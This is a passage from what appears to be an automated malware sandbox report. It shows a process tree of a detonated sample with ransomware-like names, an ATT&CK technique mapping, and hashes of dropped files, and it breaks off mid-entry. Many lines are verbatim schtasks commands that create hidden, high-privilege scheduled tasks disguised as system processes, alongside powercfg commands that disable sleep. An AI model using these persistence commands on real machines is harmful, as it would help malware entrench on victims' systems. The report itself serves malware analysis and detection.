C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe
"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"
2⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\a\Locker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"
2⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2176 -ip 2176
1⤵
PID:1728

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1844 -ip 1844
1⤵
PID:1692

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4124 -ip 4124
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5500 -ip 5500
1⤵
PID:5960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2672 -ip 2672
1⤵
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5328 -ip 5328
1⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5892 -ip 5892
1⤵
PID:2128

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
PID:3000

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
2⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 596
3⤵
- Program crash
PID:1824

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
2⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 612
2⤵
- Program crash
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 776 -ip 776
1⤵
PID:6116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3000 -ip 3000
1⤵
PID:304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5272 -ip 5272
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5488 -ip 5488
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6000 -ip 6000
1⤵
PID:5924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5664 -ip 5664
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5664 -ip 5664
1⤵
PID:1984

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2944 -ip 2944
1⤵
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6132 -ip 6132
1⤵
PID:2720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6132 -ip 6132
1⤵
PID:1060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\Setup\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Setup\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\BlockComponentwebMonitordhcp\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\BlockComponentwebMonitordhcp\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Jufbhx\RegAsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Jufbhx\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Jufbhx\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\SearchHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\Users\Default User\SearchHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\SearchHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Jufrxnb" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Favorites\june.tmp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "june.tmp" /sc ONLOGON /tr "'C:\Users\Default\Favorites\june.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Favorites\june.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "junej" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\june.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "june" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\june.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "junej" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\june.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5988

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:1260

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5128

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:3724

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:1372

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:1664

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4148

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:1404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\RegAsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 12 /tr "'C:\BlockComponentwebMonitordhcp\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\SIGNUP\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\SIGNUP\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default\My Documents\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\My Documents\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\Default\My Documents\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5820 -ip 5820
1⤵
PID:4556

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:4988

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
2⤵
PID:4168

C:\Windows\system32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
2⤵
PID:5456

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
2⤵
PID:4464

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
- Creates scheduled task(s)
PID:5904

C:\Windows\system32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
2⤵
PID:5484

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:1428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4472 -ip 4472
1⤵
PID:3368

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3856055 /state1:0x41c64e6d
1⤵
PID:484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\BlockComponentwebMonitordhcp\powershell.exe

Filesize
828KB

MD5
6b3e49b6d32aca957297d8c71e698737

SHA1
73294c085a65af8528ea636ee15132020ba38fe5

SHA256
fef594135e18a708750abad999febeba51d6efe9d6d3073f02a1acb12731eed8

SHA512
151ce51cbcce1ee4cb8b145b02124efc1cb93ef9320da60321cd179d8544930c7f2aa9af4cd4ddd0a71dc32ef5b0069fd8e6bb5e76359d3286d526ccf7e5510b

Download Submit
C:\ProgramData\MediaDevicePicker 3.0.194.66\MediaDevicePicker 3.0.194.66.exe

Filesize
2.9MB

MD5
af11c34e790a03677c43339fc82d0260

SHA1
cd6fb90b47ff1f10d4e8ea3ad14e782dbdaa068c

SHA256
2daf226107c856b1ecf9399684411b3549510db9744fb3c5a1aa51e11f5af505

SHA512
64cd1fa602bf98deba05e89a2d489f4baf7328bd36ed59b1a342630e0f05db1b9490db615a4ed3db07e6456f8b1ce18a51a095bd318ddaa0c6ba719a97c265d4

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
535b473ec3e9c0fd5aad89062d7f20e8

SHA1
c900f90b3003452b975185c27bfb44c8f0b552c4

SHA256
f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0

SHA512
33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f98089efc6427a34a49bb7b13642a50e

SHA1
67b4d8ed5bc371de793fd2be82baeb49003bec40

SHA256
c5757b4456005f0d5e27da646f9b66c18f7dbe2f5ecb0148a4554e5e9d5a7005

SHA512
5ae39383a0a410623cb4e29784d7bde86e98ac3be821daec8f4386da8cc580201f110e2fd8cde36d89064d0719cf06a3b268b82347afdbb65662f00e388f0bcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8fcb5b954224d06d9cb7e67c8664de4

SHA1
114e4362f81c0425f54425c8f5185d59d690cf1a

SHA256
005875d0e6a5a4c5977f704ba17a284ed87ea2141a083178c9bef2e543b486ed

SHA512
a0e59f0265ca4065e7ec5b772ab141897e13505b0eecbb98ec70850d2a9e8278835e8c2ab66e8303ec7ba8618043c84373172e69714b6d8f59e5787ee065e269

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3840d9bcedfe7017e49ee5d05bd1c46

SHA1
272620fb2605bd196df471d62db4b2d280a363c6

SHA256
3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

SHA512
76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a9effc21a6c57f49c849bd6c88ce6b7c

SHA1
2e53c87611aba7850dfb915411a420975b7d373e

SHA256
e8fd00ba3e27bfdaec08671c086d36b913d58d9c29731e545a68e4f0b61ab648

SHA512
29f7450f5a0b9c0d0fec0b0d362e1bf7fe6efa8694d79fe4c9e917bd562d0ed0e89ee678c705e3a54c9dd612be87d5d7c199f67f07f8cf672ee45a4d5a1c5ab5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
272681c1066e1877f071565e1ec046b6

SHA1
f5ce4176fb68f145a3fab7c1183424a8639078fb

SHA256
a5dbdb8d33100b6d6bc00efda921b5e525b9c039c42ac4cb807edfcebcfcef10

SHA512
88df60ce99c50930ee1eaab14148bfd00c55d8a816cfdd1410a1ea91fa4cec4669fc4e851526efdefce001656f77c415222803b0a79ada7d5e30760403cf83c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
82744bd21b21e4abbb311c60fa19e68d

SHA1
5fd1f7da9ad6182c9fa5efc036dc54f004e11286

SHA256
1321f139a06430cfd327b326d04117f02fedfa9f710e2f8bb34cdffd6e8ea93c

SHA512
69d269ae0eb6da52668add8917a3f632c8586dad143e9a0330eef47976be581e13448a79a1bb3869c59c41e4a731a965ea0cb308b5c2b33e0dd09ab29bd8d037

Download Submit
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe

Filesize
837KB

MD5
3ecf5cab8e919a5bb0c047bd80e5dfee

SHA1
4abdb1574cec441b1efdea63f1a30b3318bad32e

SHA256
c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc

SHA512
3b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eksydq.tmpdb

Filesize
92KB

MD5
a40b41936a82a27b1a2411c3f620a38c

SHA1
37885f5c11c4f96c642b4ee0c21c863c987fa6bd

SHA256
5cc75d924d57a36f30ce28a1430de1ff8021896d75a7bd27fe7ce91c0480e4dc

SHA512
ee4ceffa0ff57a3afc1aa2f19e2c6e2c8c313c895ab67077c5e6fef66851b27317652bbf60efe432a743b47ec01e7f43f8583e3e1eac4cea98c9261c4c392109

Download Submit
C:\Users\Admin\AppData\Local\Temp\Guavup.tmp

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgaeeys.tmpdb

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ORQCYJZO.exe

Filesize
5KB

MD5
6a2c09749219d577535d0338c6cffe06

SHA1
576b00c03455a518664308c976097097f691bca4

SHA256
75b57c1c27f33b59ab9b62dc15a2a66b0a0b28a55bdc72119edbb98a1692573c

SHA512
cd5d2269011a79e7bcdf8dfceb78e908f8bb2b6561228a25ebe3161a6194eafb6a6d79a390215e0f1d8bf04f7a2d6f26b7c532835f1187d25fa2889a84be6e0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qfajsd.tmp

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpD378.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Viovj.tmpdb

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xddbvvqm.tmpdb

Filesize
116KB

MD5
4e2922249bf476fb3067795f2fa5e794

SHA1
d2db6b2759d9e650ae031eb62247d457ccaa57d2

SHA256
c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1

SHA512
8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ff2ybdza.g25.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1111.exe

Filesize
2.8MB

MD5
e670bdc7c82eee75a6d3ada6a7c9134e

SHA1
b0f0bab6f6e92bc86e86fd7bff93c257a4235859

SHA256
a5cf4844df86abc9222fe436dbc0726e09383a61f4708cdc1a3e8a89cc3540fb

SHA512
7384550bb19ccc11243b79d3bfc9c3f25dce84de64891e7f7eb078b246bfedcd26a958a019a3a7b4ecf5ee1c4e8c8d44790f5c958a58266e5676f3a8e58f4643

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1111.exe

Filesize
1.9MB

MD5
e9643855e72593683cbc5257b6687fc2

SHA1
6b5b7c5d605f223a8a05e0e2d2e5ec4a3f326a61

SHA256
1e11f472999240b1b8474119e7d0be5069dda02af979e27cc4c0d83a70c4c2f5

SHA512
abe73037d629e4e30acd3836008a5f59d02d1002a389e524d80929504e56fbc03581184003ebbbf325c803ea7ecab6c13dab3b000490bf7aa45efe307313a50a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\123.exe

Filesize
2.8MB

MD5
a0585b5cbf87b2f6d19ace82f262135b

SHA1
83ef48c9b7b93b3ebe9e6b96fbd1bf36855d544d

SHA256
44212226bdcb02dd1a2b4fd2917f45d93e67e6dcf6252b4f7c388322566c6880

SHA512
c85de847bacea24904547024ec64be13a8ed44da071bed16aab265774cb9d5a534b9b3a208a98fa9c1abd7863893fab8d0a9a27ffe5bc2f7b6fd31479a2838b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1234.exe

Filesize
1.3MB

MD5
5e13199a94cf8664e5bfbe2f68d4738e

SHA1
8cfaa21f68226ae775615f033507b5756f5ccacc

SHA256
